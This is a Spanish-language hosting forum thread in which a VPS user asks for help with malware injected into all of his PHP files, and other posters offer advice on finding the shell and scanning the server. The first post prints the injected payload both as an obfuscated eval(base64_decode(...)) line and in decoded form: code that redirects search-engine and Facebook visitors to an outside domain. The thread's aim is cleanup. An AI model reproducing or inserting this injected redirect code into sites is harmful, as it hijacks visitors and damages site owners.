Consulta VPS (Creo tener un virus)

  • Autor Autor Makoto Yuki
  • Fecha de inicio Fecha de inicio
M

Makoto Yuki

Gamma
Programador
Hola gente,
Queria pedirles asesoramiento en este tema,
Desde hace 2 semanas aparece un codigo en mis webs (Solo en Archivos PHP)
En todas sin excepcion x.x

Osea en todas las funciones php sale esto:

Insertar CODE, HTML o PHP: 
eval(base64_decode("CmVycm9yX3JlcG9ydGluZygwKTsKJHFhenBsbT1oZWFkZXJzX3NlbnQoKTsKaWYgKCEkcWF6cGxtKXsKJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOwokdWFnPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsKaWYgKCR1YWcpIHsKaWYgKCFzdHJpc3RyKCR1YWcsIk1TSUUgNy4wIikgYW5kICFzdHJpc3RyKCR1YWcsIk1TSUUgNi4wIikpewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tL2wiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsKaWYgKCFzdHJpc3RyKCRyZWZlcmVyLCJjYWNoZSIpIGFuZCAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSBhbmQgIXN0cmlzdHIoJHJlZmVyZXIsIkVlWXAzRDciKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly91ZW5ka2drdy5kZG5zLm1lLnVrLyIpOwpleGl0KCk7Cn0KfQp9Cn0KfQ=="));

Que es basecode64 desencriptado es:

Insertar CODE, HTML o PHP: 
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (!stristr($uag,"MSIE 7.0") and !stristr($uag,"MSIE 6.0")){
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"webalta") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"facebook.com/l") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") and !stristr($referer,"inurl") and !stristr($referer,"EeYp3D7")){
header("Location: http://uendkgkw.ddns.me.uk/");
exit();
}
}
}
}
}

Y queria saber si a alguno le ha pasado? y si es asi como hicieron para borrarlo definitivo de sus webs 🙁 ??

Lamentablemente esto me anda arruinando visitas de facebook,google,yahoo,bing y de varios sitios como ven :/

Y pues ya hable con soporte de mi VPS y como no tengo contratado el servicio de administracion no me quieren ayudar.

Lo curioso es que salio cuando acabe de pagar este mes (Mas o menos por el 21 de agosto)

Queria saber si me pueden asesorar para borrar el virus definitivamente o si me recomiendan cambiarme de server (Uso VPS de LinoVPS)

Y la verdad andaba vastante bien con esta empresa pero viendo esto ya no se que decir.
 
Es posible que tu CMS tenga algún agujero de seguridad, que hace que inyecten código, te recomendaría, lo actualizaras ( incluido los módulos ), revisaras los permisos de los archivos, y pasaras algún antivirus al servidor completo, sino te lo hace LinoVPS, tendrás que hacerlo tú, o buscar algún proveedor que lo realice.

Un saludo
 
SenciNet dijo:
Es posible que tu CMS tenga algún agujero de seguridad, que hace que inyecten código, te recomendaría, lo actualizaras ( incluido los módulos ), revisaras los permisos de los archivos, y pasaras algún antivirus al servidor completo, sino te lo hace LinoVPS, tendrás que hacerlo tú, o buscar algún proveedor que lo realice.

Un saludo
Hacer clic para expandir...

No uso CMS uso un script php en todas mis webs a excepcion de una que es wordpress pero anda actualizada hasta la ultima version.
Como paso un antivirus al server?

No conoces algun sysadmin que pueda checarlo? 🙁
 
Te han invadido el sistema, lo mas probable que fuera por el wordpress y tienes un codigo malicioso que redirecciona a un sitio si viene de x referido.

Busca donde esta el shell y remuevelo asi podras limpiar el codigo inyectado.

Saludos.
 
OscarS dijo:
Te han invadido el sistema, lo mas probable que fuera por el wordpress y tienes un codigo malicioso que redirecciona a un sitio si viene de x referido.

Busca donde esta el shell y remuevelo asi podras limpiar el codigo inyectado.

Saludos.
Hacer clic para expandir...

Buenas bro crees poderlo checar,
Vos no soy bueno checando y no se como ver donde esta el shell :S
Dime cuanto me cobrarias pero porfavor ayudame 🙁
 
Makoto Yuki dijo:
Buenas bro crees poderlo checar,
Vos no soy bueno checando y no se como ver donde esta el shell :S
Dime cuanto me cobrarias pero porfavor ayudame 🙁
Hacer clic para expandir...

Enviame un mp con tu skype y te lo reviso sin compromiso.

Saludos.
 
Desde cpanel puedes escanear con clamav, aunque si tienes muchos archivos infectados como das a entender es mejor usar 2 o 3 anti malwars para ver eso y encontrar todos los archivos infectados, cambiar de empresa no soluciona nada como ya has dicho no tienes administración contratada te puede pasar lo mismo en otro sitio más si el culpable fue algún script, theme, plugin etc :/
 
Hay que estar conectado o registrado para responder aquí.
Atrás
Arriba